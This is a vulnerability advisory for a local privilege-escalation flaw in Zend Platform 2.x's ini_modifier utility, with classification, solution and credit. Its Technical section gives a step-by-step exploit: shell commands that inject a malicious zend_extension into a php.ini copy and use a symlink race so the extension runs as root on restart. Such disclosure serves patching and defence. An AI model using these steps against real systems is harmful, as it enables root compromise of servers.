|
|
Info |
Last Modified |
| 6 months ago |
|
|
|
|
Description |
Zend Platform contains a flaw that may allow a malicious user to gain access to unauthorized privileges. A local user can trigger this issue by using the ini_modifier utility's -f parameter to edit a copy of php.ini, which is responsible for loading of PHP extensions that run with root credentials, performing a symlink attack using the directory that contains the attacker-controlled php.ini file, and then linking this directory to /usr/local/Zend/etc. Upon server restart, the injected malicious PHP extensions will be run with root credentials. This flaw may lead to a loss of integrity.
|
|
Classification |
Location:
Local Access Required
Attack Type:
Misconfiguration,
Race Condition
Impact:
Loss of Integrity
Exploit:
Exploit Available
Disclosure:
OSVDB Verified
|
|
Technical |
The purpose of the ini_modifier binary is to edit the system-wide php.ini file from within Zend Platform's GUI. The ini_modifier binary is protected by the GUI password, which needs to be entered before being allowed to edit anything.
(ini_modifier) help
modify entry - Modifies an entry.
switch extension - Enables or disables an extension.
switch zend_extension - Enables or disables a Zend extension.
help - Shows this help.
write - Writes the changes.
quit - Quits the program.
1) Create a temporary directory and copy the /usr/local/Zend/etc/php.ini file into that directory:
$ cd /tmp
$ mkdir ini
$ cd ini
$ cp /usr/local/Zend/etc/php.ini .
2) Edit zend_gui_password in the php.ini copy to a MD5 hash of your choice, but make sure to remember the old MD5 hash:
$ cd ..
$ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
Password:
(ini_modifier) switch zend_extension /var/www/upload/evil.so on
(ini_modifier) modify entry Zend zend_gui_password OLDMD5
(ini_modifier)
3) Perform a symlink attack using the directory that contains the attacker-controlled php.ini file and link this directory to /usr/local/Zend/etc:
$ cd /tmp
$ mv ini ini.bak
$ ln -s /usr/local/Zend/etc ini
4) Continue to edit the ini file:
(ini_modifier) write
(ini_modifier) quit
$ cat /usr/local/Zend/etc/php.ini
[PHP]
zend_extension=/var/www/upload/evil.so
...
zend_gui_password=OLDMD5
|
|
Solution |
Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s):
1. Login as root.
2. Download the ini_modifier archive for your platform from the Zend Platform website.
3. Extract the archive and copy the updated ini_modifier binary to: Platform_install_dir/sbin/ini_modifier
4. Enter: chown root Platform_install_dir/sbin/ini_modifier
5. Enter: chgrp zendtech Platform_install_dir/sbin/ini_modifier
6. Enter: chmod 2755 Platform_install_dir/sbin/ini_modifier
2. Remove the old ini_modifier binary from your system (do not backup it).
|
|
Products |
|
Zend
 |
2.x |
|
|
|
|
Credit |
- Stefan Esser - sesser
 hardened-php.net - www.hardened-php.net
|
|
BlogsProvided by Technorati
|
None found at this time
|
|
|
